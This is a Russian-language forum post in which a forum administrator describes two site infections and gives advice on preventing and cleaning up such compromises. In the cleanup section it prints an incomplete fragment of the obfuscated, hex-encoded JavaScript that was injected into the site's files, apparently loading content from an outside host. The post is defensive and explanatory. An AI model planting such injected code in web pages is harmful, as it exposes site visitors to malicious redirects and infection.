Многие из вас частенько натыкались в интернете на сайты, которые были поражены вирусами, при посещении которых антивирус начинал истошно вопить. Натыкался на такие и я, думал мол, как так админы допустили это (ну конечно есть определенный процент сайтов, созданных специально для рассады заразы). Думал меня пронесет, все вроде защищено... Ан нет, в истории нашего форума произошло 2 заражения. Первое - очень легкое, заражены были только JS-файлы, а может я вовремя заглянул и закрыл очаг. Второе же, недавнешнее - очень жесткое. Почти 60% файлов были заражены, а это и php-, html-, JS-файлы + перенаправление на какой то трейдерский сайт. Потратив день, сумел все же восстановить форум. Дело это конечно неприятное, но зато получил своеобразный опыт, да и бекап форума сделал наконец то полный
Так что ребята, никогда не расслабляйтесь, беда может и вас постигнуть.... Давайте подумаем, а чем же можно уберечься от подобных ситуаций ?
1. Пароли к панели хостинга и ФТП
- Это основное и самое больное место всех без исключения. Вам главное понять, что каким бы ни был начальный пароль, данный вам хостером - он рано или поздно будет взломан. Почему ? Да потому, что ни у одного хостера я не видел задержки на безошибочный ввод пароля. Иными словами, если ктото задастся целью ломануть пароль - его ничто не остановит. Пароль можно подбирать бесконечно долго, таймаутов на ввод неправильного пароля нет нигде. Собственно первоочередная ваша задача - смена дефолтных паролей доступа на более сложные, я бы даже рекомендовал делать пароли максимально длинными. Составляйте их таким образом, чтобы логика напрочь отсутствовала, брякните по клаве на 20 знаков пароль с цифрами и буквами. Чем длинней пароль - тем дольше его подбирать, у взломщика может попросту кончиться терпение.
2. Доступы на папки сервера
- Это такая вещь, стоящая на одном уровне с первым пунктом. Возможно даже выше. Тут главное понять что злоумышленникам иногда и не надо подбирать пароли. Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать. Банально заливается шелл и в течении пары часов ваш форум заражен. Так что не лепите тысячи папок на ФТП, делайте только нужные и настраивайте к ним нормальные права доступа.
3. Проверенные модификации и скрипты
- Раз уж говорим о наших форумах, то нужно помнить и об этом пункте. Собственно вас могут подкупить красивым названием и описанием мода(скрипта), а уж внутри него будет настоящий троянчик или уязвимость. Так что советую ставить только моды, прошедшие валидацию на оффоруме. Ставить моды, которые вам необходимы, а не потому что у большинства они стоят. Такое же дело и со скриптами. Перед их установкой внимательно читайте описание, комменты, просмотрите код скриптов, если чтото покажется подозрительным - лучше спросить у знающих людей.
4. Частые и полные бекапы форума.
- Способ пассивной защиты, писать особо тут нечего. Логика проста - если вы делаете частые полные бекапы форума, то при заражении файлов, вам потребуется всего лишь заново залить файлики с заменой (ну разумеется пароли поменять от хостинга).
5. Панель вебмастера Гугл
- Этот инструмент весьма полезен. Почему не яндекс ? Потому что яндекс не умеет кое чего. Представим себе такую ситуацию - вам необходимо отлучиться от форума на достаточно большой срок, доступ у вас есть только к почте, а за это время ваш форум все же заразили. Так вот, с задержкой в 5-6 часов вам придет на мыло письмецо от Гугла, мол заражен ваш форум. Очень полезная вещь, ведь никто не знает наверняка когда форум может быть заражен, а так вы получите уведомление и наиболее быстро среагируете на аварию. Собственно, не ленитесь и добавляйте свой форум в панель вебмастера Гугла
Со способами защиты мы ознакомились, теперь подумаем над вашими действиями в том случае если все же получили заражение ....
Раз уж вы читаете данную статью, то наверняка после прочтения добавите наконец то свой форум в Гугл
Так вот, либо сами замечаете недовольство антивируса на ваш форум либо получаете письмецо от Гугла, тут главное не паниковать, не делать опрометчивых действий. Расслабьтесь и начинайте по пунктам...
1. Отключение форума на уровне хостинга
- Такая функция должна быть у каждого хостера. Тут же вам надо отключить работу вашего домена, дабы прекратить издевательство над пользователями (заодно и возможно остановить процесс распространения заражения). Не бойтесь этого делать, ФТП доступ у вас то будет.
2. Смена паролей
- Очевидное решение - поменяйте пароли всех доступов на хостинг - панель, ФТП, может еще чего. Таким действием отрубим потенциального злоумышленника от файлов.
3. Работа с файлами форума
- Есть актуальный бекап ? Восстанавливаем. Нет ? Скачиваем абсолютно все файлы форума себе на компьютер и через Нотепад ++ смотрим сначала все JS файлы. Они заражаются в первую очередь, потом уж остальные. Смотрим код скриптов на наличие совершенно лишних участков, к примеру у меня был такой код (он разумеется не полный)
Код: Выделить всё
<!--ded509--> catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_77_27_
44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_
74__30_42_14_11_14_11_27_27_27_27_77_35_7a_79_6a_27_44_27_2e_6f_7b_7
b_77_41_36_36_6a_68_6a_68_6d_73_7c_77_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_77_35_7a_7
b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73
_7c_7b_6c_2e_42_14_11_27_27_27_27_77
__63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27
_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80
_50_6b_2f_2e_77_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_77_30_42_
14_11_27_27_27_27_84_14_11_84_30_2f_30_42""split"}</script><!--/ded509-->
4. Завершающий этап
- Активируем работу домена, смотрим на адекватную работу форума, антивирь молчит. Все хорошо, идем в панель хостинга и смотрим лог работ с папками за ближайшие 24 часа. Нам надо выловить момент заражения и понять - ломанули ли пароль иль шелл залили, делаем необходимые выводы. В панели вебмастера Гугла отправляем форум на перепроверку и в течении 24 часов ваш форум полностью разблокируется в Гугле и продолжит свою работу на благо общества
Впринципе наверное все написал что и хотел. Сами видите, дело одновременно и сложное и простое это. Надеюсь вас не постигнет такая беда, а если что - у вас есть маленькое руководство к действию, можете и мне в личку стукнуть, помогу если будет завал. Всем безоблачной работы ваших форумов
ЗЫ. Может у кого есть еще советы? Пишите, не стесняйтесь, составим руководство вместе